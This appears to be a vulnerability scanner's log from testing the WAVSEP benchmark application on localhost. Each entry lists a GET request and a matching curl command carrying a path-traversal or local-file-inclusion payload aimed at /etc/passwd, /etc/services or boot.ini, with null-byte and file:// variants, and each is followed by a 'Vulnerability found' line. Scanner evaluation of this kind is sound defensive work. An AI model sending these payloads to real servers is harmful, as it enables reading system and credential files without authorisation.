GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
